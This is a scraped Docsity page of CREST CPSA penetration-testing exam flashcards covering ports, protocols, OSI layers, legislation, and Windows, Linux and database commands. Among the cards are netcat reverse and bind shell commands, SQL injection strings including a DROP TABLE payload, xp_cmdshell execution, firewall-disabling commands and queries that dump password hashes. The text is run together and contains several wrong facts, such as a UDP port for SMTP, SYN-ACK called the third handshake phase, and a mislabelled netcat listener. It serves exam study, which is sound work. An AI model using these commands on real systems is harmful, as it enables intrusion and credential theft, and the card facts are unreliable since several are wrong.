Study with the several resources on Docsity
Earn points by helping other students or get them with a premium plan
Prepare for your exams
Study with the several resources on Docsity
Earn points to download
Earn points by helping other students or get them with a premium plan
Community
Ask the community for help and clear up your study doubts
Discover the best universities in your country according to Docsity users
Free resources
Download our free guides on studying techniques, anxiety management strategies, and thesis advice from Docsity tutors
CREST CPSA New Practice Exam With Accurate Solutions 100% Verified Latest Update
Typology: Exams
1 / 39
iptables - ANSWER A user-space utility program that allows a system administrator toconfigure the tables provided by the Linux kernel firewall and the chains and rules it stores. Squid Proxy - ANSWER 3128 Wireshark and TCPdump - ANSWER Common packet analyzers. Allows the user todisplay TCP/IP and other packets being transmitted or received over a network to which the computer is attached. pfSense - ANSWER Open source firewall/router computer software distribution basedon FreeBSD.
Benefits of a Penetration Test - ANSWER - Improvement of the management system
Another Structure of a Penetration Test - ANSWER Reconnaissance
Vulnerability Scanning Investigation Exploitation Infrastructure Testing - ANSWER Includes all internal computer systems, associatedexternal devices, internet networking, cloud and virtualization testing.
Types of Infrastructure Testing ANSWER External Infrastructure Penetration TestingInternal Infrastructure Penetration Testing Cloud and Virtualization Penetration Testing Wireless Security Penetration Testing External Infrastructure Testing ANSWER Mapping flaws in the external infrastructure Benefits of External Infrastructure Testing ANSWER Identifies flaws within the firewallconfiguration that could be misused. Finds how information could be leaked out from the systemSuggests how these issues could be fixed Prepares an extensive report on the security risk of the networks and suggestssolutions for the same. Ensures overall efficiency and productivity of your business.
Benefits of Internal Infrastructure Testing - ANSWER - Finds out how even a smallsecurity weakness can be used by an internal attacker to his advantage Finds out the potential business risk and damage that an internal attacker can cause toyour business Enhances internal infrastructure security systems Prepares an inclusive report giving details of the security exposures of internalnetworks along with the detailed action plan on how to deal with it
Benefits of Cloud and Virtualization Penetration Testing - ANSWER - Discover the realrisks within the virtual environment and suggests the methods and costs to fix the threats and flaws- Provides guidelines and an action plan how to resolve the issues
Advantages of Black Box Testing - ANSWER - Test is generally conducted with theperspective of a user, not the designer
paths of a module have been exercised
Computer Misuse Act 1990 Highlights - ANSWER Section 1: Unauthorized access tocomputer material Section 2: Unauthorized access with intent to commit or facilitate commission of furtheroffenses Section 3: Unauthorized acts with intent to impair, or with recklessness as to impairingthe operation of a computer
Human Rights Act 1998 Highlights - ANSWER - The right to life
Consent Information for Penetration Test - ANSWER - Contact Name & Title of persongiving consent
Legal Penetration Testing - ANSWER - A statement of intent to be duly signed by bothparties
TCP - ANSWER TCP stands for Transmission Control Protocol. It is a main protocol fromthe Internet protocol suite.
Task of TCP - ANSWER To establish a connection between the client and the serverbefore data can be sent.
User Datagram Protocol - ANSWER Applications that do not require a reliable datastream use User Datagram Protocol.
Responsibility of Internet Protocol - ANSWER Delivering packets from the source host tothe destination host with their IP addresses in the packet header.
UDP- ANSWER Yes, UDP is in the Internet protocol suite. SYN in TCP Handshake - ANSWER The use of SYN is to initiate and establish aconnection. It also helps you to synchronize sequence numbers between devices.
UDP handshakes - ANSWER No, UDP does not perform handshakes. ACK in TCP handshaking - ANSWER Helps to confirm to the other side that it hasreceived the SYN.
SYN-ACK in TCP handshaking - ANSWER SYN-ACK is a SYN message from the localdevice and ACK of the earlier packet.
FIN - ANSWER Used to terminate the connection. Three way handshake - ANSWER TCP is known for performing a three way handshake. SYN - ANSWER SYN means Synchronize. SYN-ACK phrase - ANSWER SYN-ACK is the third phase after the SYN and ACK phrasesof a TCP handshake.
ACK - ANSWER ACK means Acknowledgement. SYN-ACK - ANSWER SYN-ACK means Synchronize Acknowledgement. FIN in TCP - ANSWER FIN means Finish. Port 9100 - ANSWER Jetdirect. Port 567 - ANSWER DHCPv6 (servers). Port 593 - ANSWER RPC over HTTPS. Port 49 - ANSWER TACACS. TACACS - Terminal Access Control of Authentication and Control Systems. Port 514 - Syslog.
Port 520 - RIP. Port 123 - NTP. Port 500 - Internet Security Association and Key Management Protocol - Key exchange. Port 587 - SMTP. UDP port for SMTP - 587. Port 1521 - Oracle. Port 6000 - X11. Port 21 - FTP. Port 389 - LDAP. Port 67 - DHCP server. Port 23 - ANSWER Telnet. Port 546 - ANSWER DHCPv6 (client). Port 445 - ANSWER SMB.
Port 161 - ANSWER SNMP. Port 143 - ANSWER IMAP. Port 1194 - ANSWER VPN. Port 1434 - ANSWER MS-SQL (monitoring). Port 636 - ANSWER LDAPS. Port 3306 - ANSWER MYSQL. Port 69 - ANSWER TFTP. Port 25 - ANSWER SMTP. Port 53 - ANSWER DNS. Port 80 - ANSWER HTTP. Port 139 - ANSWER NETBIOS (session services). Port 1433 - ANSWER MS-SQL. Port 2049 - ANSWER NFS, or Network File System. Port 5060 - ANSWER, this is the Session Initiation Protocol for unecrypted signalling,
utilizing TCP/UDP. Port 3389 - ANSWER RDP or Remote Desktop Protocol. Port 5222 - ANSWER, this is used for Jabber. Port 179 - ANSWER, the Border Gateway protocol. Port 902 - ANSWER, VMWARE. Port 1080 - ANSWER, this is the SOCKS Proxy. Dameware - ANSWER, 6129 and 1629. Port 6667 - ANSWER, this is IRC. Port 9001 - ANSWER, Tor, HSQL. Port 9090 - ANSWER, Openfire. Port 5666 - ANSWER, Nagios. Port 5432 - ANSWER Postgres. Service on port 201 - ANSWER AppleTalk. Nagios - ANSWER An open source system monitoring service.
Postgres - ANSWER An object relational database management system. X11 - ANSWER A windowing display system for bitmap displays, common on unix-likeoperating systems.
CDP - ANSWER Cisco Discovery Protocol. Function of CDP - ANSWER It's a network discovery tool, allows admins to identifyneighboring Cisco devices.
CDP default setting - ANSWER Yes, CDP is enabled by default. DTP - ANSWER Dynamic Trunking Protocol. HSRP - ANSWER Hot Standby Router Protocol. VTP - ANSWER Protocol that propagates the definition of VLANs on the whole local areanetwork.
Hot Standby Router Protocol - ANSWER A network protocol that provides redundancyfor routers.
Symmetric Encryption - ANSWER Only one key is used to both encrypt and decryptelectronic information.
Asymmetric Encryption - ANSWER There is a public key to encrypt and a private key todecrypt.
Block Algorithm - ANSWER An algorithm that encrypts information in blocks. Yersinia - ANSWER A Layer 2 Testing Tool. OSI Layer 7 - ANSWER Application Layer. OSI Layer 5 - ANSWER Session Layer. OSI Layer 3 - ANSWER Network Layer. OSI Layer 1 - ANSWER Physical Layer. OSI Layer 2 - ANSWER Data Link Layer. OSI Layer 4 - ANSWER Transport Layer. OSI Layer 6 - ANSWER Presentation Layer. CDP Advantages - ANSWER Finds out about neighbouring devices and theirconfiguration, can discover routers or switches that are incorrectly configured, helps in troubleshooting. Layer 4 Function - ANSWER Send data across using the TCP and UDP protocols. Layer 7 Function - ANSWER Applications have access to the network services. Layer 1 Function - ANSWER Transmits raw bitstream across the physical medium.
Layer 6 Function - ANSWER Ensures that data is in a usable format and is where dataencryption occurs.
Layer 5 Function - ANSWER Maintains connections and is responsible for controllingports and sessions.
Layer 2 Function - ANSWER Defines the format of data on the network. Layer 3 Function - ANSWER Decides which physical path the data will take. TCP Port 1 - ANSWER TCP Port Service Multiplexer (TCPMUX). TCP Port 5 - ANSWER Remote Job Entry (RJE). TCP Port 7 - ANSWER ECHO or ICMP. TCP Port 18 - ANSWER Message Send Protocol (MSP). TCP Port 29 - ANSWER MSG ICP. TCP Port 37 - ANSWER Time Protocol. TCP Port 42 - ANSWER Host Name Server (Nameserv). TCP Port 43 - ANSWER WHOIS. TCP Port 70 - ANSWER Gopher Services.
TCP Port 79 - ANSWER Finger. TCP Port 103 - ANSWER X.400 Standard. TCP Port 159 - ANSWER SQL Server. TCP Port 190 - ANSWER Gateway Access Control Protocol (GACP). TCP Port 118 - ANSWER SQL Services. TCP Port 197 - ANSWER Directory Location Service (DLS). TCP Port 398 - ANSWER Novell Netware over IP. TCP Port 119 - ANSWER NNTP (Network News Transfer Protocol) Newsgroup. TCP Port 444 - ANSWER Simple Network Paging Protocol (SNPP). TCP Port 453 - ANSWER Apple Quicktime. TCP Port 500 - ANSWER IKE Internet Key Exchange. TCP/IP Model Mnemonic - ANSWER Never Ingest Turian Almonds. CAT5 - ANSWER CAT5 category 5 cable is a twisted pair cable for computer networking. 10/100/1000baseT - ANSWER An Ethernet standard so developed by the Institute of
Electrical and Electronics Engineers (IEEE). Token Ring - ANSWER A data link for a local area network (LAN) in which all stations areconnected in a ring or star topology.
Wireless (802.11) - ANSWER The IEEE 802.11 is a standard employed for wirelessEthernet networks.
LM Hash - ANSWER Primary Windows LAN hash prior to Windows NT with 14 characterlimit.
DES Encryption - ANSWER A 64 bit block cipher that has five modes of operation,repeated 16 times for each encryption/decryption operation.
3DES Encryption - ANSWER 168 bit key encryption (48 cycles). TTL for Windows - ANSWER 128. TTL for Linux - ANSWER 64. TTL (Time to Live) - ANSWER Indicates the maximum time that an IPv4 packet can resideon the network before being discarded.
Cisco Password Encryption - ANSWER Various including secret 4: Crappy SHA256,secret 5: Salted MD5.
SIP Requests - ANSWER INVITE, ACK, BYE, CANCEL, OPTIONS, REGISTER, PRACK,SUBSCRIBE, NOTIFY, PUBLISH, INFO, REFER, MESSAGE, UPDATE.
SMTP Requests - ANSWER MAIL, RCPT, DATA.
SNMP Requests - ANSWER Get, GetNext, Set, GetBulk, Response, Trap, Inform. HTTP Status Codes - ANSWER 1xx - Info, 2xx - Success, 3xx - Redirection, 4xx - Error,5xx - Server Error.
HTTP Status Code 404 - ANSWER NOT FOUND the method is not available. HTTP Status Code 302 - ANSWER Temporarily Moved. HTTP Status Code 301 - ANSWER Moved Permanently. HTTP Status Code 410 - ANSWER Gone. SQL Injection (Escape Characters) - ANSWER ' OR '1' = '1' --. SQL Injections (Type Handling) - ANSWER 1; DROP TABLE users. Linux File Permissions - ANSWER drwxrwxrwx 2 user(owner) group size date filename. Linux Command: Change Password - ANSWER passwd
/bin - ANSWER User Binaries /boot - ANSWER Bootup related files /dev - ANSWER Interface for system devices /etc - ANSWER System Config Files /home - ANSWER Base directory for user files /lib - ANSWER Critical software libraries /opt - ANSWER Third party software /proc - ANSWER System and running processes /root - ANSWER Home for root /sbin - ANSWER Sys Admin binaries /tmp - ANSWER Temporary Files /usr - ANSWER Less critical files /var - ANSWER Variable system files prstat -a - ANSWER Solaris Command: Process Listing.
svcs -a - ANSWER Solaris Command: Services and Status. svcadm start
Windows NT 5.2 Versions - ANSWER Windows XP (64 bit, Pro 64 bit), Windows Server2003 and R2, Windows Home Server.
Windows NT 6.0 Versions - ANSWER Windows Vista (ALL), Windows Server 2008(Foundation, Standard, Enterprise).
Windows NT 6.1 Versions - ANSWER Windows 7 (ALL), Windows Server 2008 R2 (ALL). Windows NT 6.2 Versions - ANSWER Windows 8, Windows Phone 8, Windows Server2012.
Windows NT 10 versions - ANSWER Windows 10, Windows Server 2016, WindowsServer 2019, Windows Server 2022, Windows 11.
%SYSTEMDRIVE%\boot.ini - ANSWER Contains the boot options for computers withBIOS firmware running NT-based operating system prior to Windows Vista.
%SYSTEMROOT%\repair\SAM - ANSWER Stores Windows users' passwords in ahashed format, in LM hash and NTLM hash. These are backups of C:\windows\system32\config\SAM.
Windows Commands: System Info - ANSWER ver : OSVersion, sc query state=all :Services, tasklist /svc : Processes and Services, echo %USERNAME% : Current user.
Windows Command: Find Files of Type - ANSWER dir /a /s /n c:\*.pdf. Windows Commands: Add User, Make Admin - ANSWER net user
Linux Command: Add User, Make Sudoer - ANSWER useradd
Command: View Network Info - ANSWER Linux: ifconfig, Windows: ipconfig /all. Command: Display File Contents - ANSWER Linux:
IIS 1 Defaults - ANSWER Windows NT Addon. IIS 4 Defaults - ANSWER NT4 Option Pack. IIS 5 Defaults - ANSWER Windows 2000. IIS 2 Defaults - ANSWER NT 4.0. IIS 5.1 Defaults - ANSWER Windows XP.
IIS 3 Defaults - ANSWER NT 4 Service Pack. IIS 6 Defaults - ANSWER Windows Server 2003, Windows XP Pro. IIS 7 Defaults - ANSWER Windows Vista, Server 2008. IIS 7.5 Defaults - ANSWER Windows 7, 2008 R2. IIS 8 Defaults - ANSWER Windows Server 2012, Windows 8. IIS 8.5 Defaults - ANSWER Windows Server 2012 R2, Windows 8.1. IIS 10 v 1607 Defaults - ANSWER Windows Server 2016, Windows 10 AnniversaryUpdate.
IIS 10 v 1709 Defaults - ANSWER Windows 10 Fall Creators, v1709. IIS 10 v 1809 Defaults - ANSWER Windows Server 2019, Windows 10 October Update. Windows Command: Disable Firewall - ANSWER netsh advfirewall set currentprofilestate off, netsh advfirewall set allprofiles state off.
Sysinternals Suite - ANSWER A suite of very powerful Windows administrationapplications to view, troubleshoot and edit Windows functions.
WMCI - ANSWER Windows Management Instrumentation Command-Line. WMCI Command: Execute Process - ANSWER wmci process call create"process_name".
WMCI Command: Uninstall Software - ANSWER wmci product where name="XX" calluninstall /nointeractive.
PCI Card Info Storage Common-Use - ANSWER - Store card details (i.e CC number,expiry) in encrypted form, - Store cardholder details (name, address, contact details.i.e PII) in a SEPARATE encrypted database with a unique reference identifier linking thetwo, - DO NOT STORE sensitive data (i.e CVV2, CVV or CID values).
Windows: Active Directory Default Location - ANSWER C:\Windows\NTDS. Windows: Domain Common Folders - ANSWER C:\Windows\SYSVOL. dsquery - ANSWER Remote Server Administration Tools (RSAT) feature pack tool usedto enumerate Windows Domain.
Classful IP Range: Class A - ANSWER 128 Networks (2^7), 16,777,216 Addresses pernetwork (2^24).
Classful IP Range: Class B - ANSWER 16,384 Networks (2^14), 65,536 Addresses pernetwork (2^16).
Classful IP Range: Class C - ANSWER 2,097,152 Networks (2^21), 256 Addresses pernetwork (2^8).
Classful IP Range Calculation - ANSWER If first bit is "0", it's a class A address. Ifsecond bit is a "0", its class B address. If third bit is a "0", its class C address. If the fourth bit is "0", it's class D address. If its "1", then it's class E address. Classless Subnets / CIDR - ANSWER Class C - 255.255.255.0, /24 (254 Hosts), Class B -255.255.0.0, /16 (65,534 Hosts), Class A - 255.0.0.0, /8 (16,777,214 Hosts).
Hexadecimal Chart - ANSWER 0, 1, 2, 3, 4, 5, 5, 6, 7, 8, 9, 10 - A, 11 - B, 12 - C, 13 - D, 14 -E, 15 - F.
VLAN - ANSWER A logically segmented switched network, segmented by function,project team, or application, without regard to the physical locations of the users.
VLAN IDs 1002-1005 - ANSWER Token Ring and FDDI VLANs VLAN IDs greater than 1005 - ANSWER Extended-range VLANs (not stored in the VLANdatabase)
VLAN IDs 1-1005 - ANSWER Normal-range VLANs vlan.dat - ANSWER Configurations for VLAN IDs 1-1005 GLBA - ANSWER Gramm-Leach-Bliley Act. Gramm-Leach-Bliley Act of 1999 - ANSWER Require financial institutions to protectcustomer data in order to safeguard the security and confidentiality.
GDPR - ANSWER General Data Protection Regulation. FERPA - ANSWER Family Educational Rights and Privacy Act. PCI DSS - ANSWER Payment Card Industry Data Security Standard. Basel Accord - ANSWER An agreement that required banks to hold as capital at least 8%of their risk-weighted assets.
ISO 27000 Series - ANSWER A series containing a range of individual standards anddocuments specifically reserved by ISO for information security.
COBIT - ANSWER Control Objectives for Information and Related Technology. IPv4 - ANSWER The Internet Protocol version 4 is the dominant protocol for routingtraffic on the Internet, specifying 'to' and 'from' addresses using a dotted decimal such as '122.45.255.0'. Cat 5 - ANSWER Category 5 wire, a TIA/EIA standard for UTP wiring that can operate atup to 100 Mbps.
TTL - ANSWER Time to Live. CSMA/CA - ANSWER Carrier Sense Multiple Access with Collision Avoidance. CDMA - ANSWER Code Division Multiple Access (GSM competitor).
Netcat: Start Listener to Catch Shell - ANSWER Linux: nc 10.0.0.1 1234 -e /bin/sh;Windows: nc 10.0.0.1 1234 -e cmd.exe (-e is execute and is not always supported)
Netcat: Listen - ANSWER nc -nlvp
Netcat: Bind Shell - ANSWER Listener: nc -nlvp 4444 -e cmd.exe; Sender/ 'Talker': nc -nvIP to connect to 4444
Netcat: Reverse Shell - ANSWER Listener: nc -nlvp 4444; Sender: nc -nv IP to send to4444 /bin/bash (sends shell!)
NMap: Scan Types - ANSWER -sP : ping scan; -sS : syn scan ('half open' scan); -sT :connect scan (full TCP); -sU : UDP scan; -sO : protocol scan
Port Count 65,536 - ANSWER 2^16 Ports; Applies to TCP AND UDP NMap: Scan EVERY Port - ANSWER TCP: nmap -p- ; UDP: nmap -sU -p- NMap: Common Options - ANSWER -p1-65535 : Ports; -T[0-5] : 'Scan Speed', can helphide you; -n : No DNS Resolution; -O : OS Detection; -A : AGGRESSIVE; -sV : Version Detection; -PN : No Ping; -6 : IPv6 Scan; -oA
IIS - ANSWER Microsoft Web Server Apache / Tomcat - ANSWER Apache Web Servers GWS - ANSWER Google Web Server WebSphere - ANSWER IBM Web Server MS-SQL: DB Version - ANSWER SELECT @@version; EXEC xp_msver (detailed version
info) MS-SQL: Run OS Command - ANSWER EXEC master.xp_cmdshell 'net user' MS-SQL: SELECT commands - ANSWER SELECT HOST_NAME( ) : Hostname and IP;SELECT DB_NAME ( ) : Current DB; SELECT name FROM master.sysdatabases; : List DBs; SELECT user_name ( ) : Current user; SELECT name FROM master.syslogins : Listusers; SELECT name FROM master.sysobjects WHERE xtype='U'; : List Tables; SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHEREname='mytable'); : List columns
MS-SQL: List all Tables and Columns - ANSWER SELECT name FROM syscolumnsWHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable')
MS-SQL: System Table (Info on All Tables) - ANSWER SELECT TOP 1 TABLE_NAMEFROM INFORMATION_SCHEMA.TABLES
MS-SQL 2005 Vulnerability (Password Hashes) - ANSWER SELECT name,password_hash FROM master.sys.sql_logins
Postgres: SELECT statements - ANSWER SELECT version(); : DB Version; SELECTinet_server_addr(); : Hostname and IP; SELECT current_database(); : Current DB; SELECT datname FROM pg_database; : List DBs; SELECT user; : Current user; SELECTusername FROM pg_user; : List Users; SELECT username,passwd FROM pg_shadow : List password hashes MySQL Default Credentials - ANSWER root | MYSQL MySQL: SELECT Commands - ANSWER SELECT @@version; : DB Version; SELECT@@hostname; : Hostname and IP; SELECT database(); : Current DB; SELECT distinct (db) FROM mysql.db; : List DBs; SELECT user(); : Current user; SELECT user FROMmysql.user; : List Users; SELECT host,user,password FROM mysql.user; : List password hashes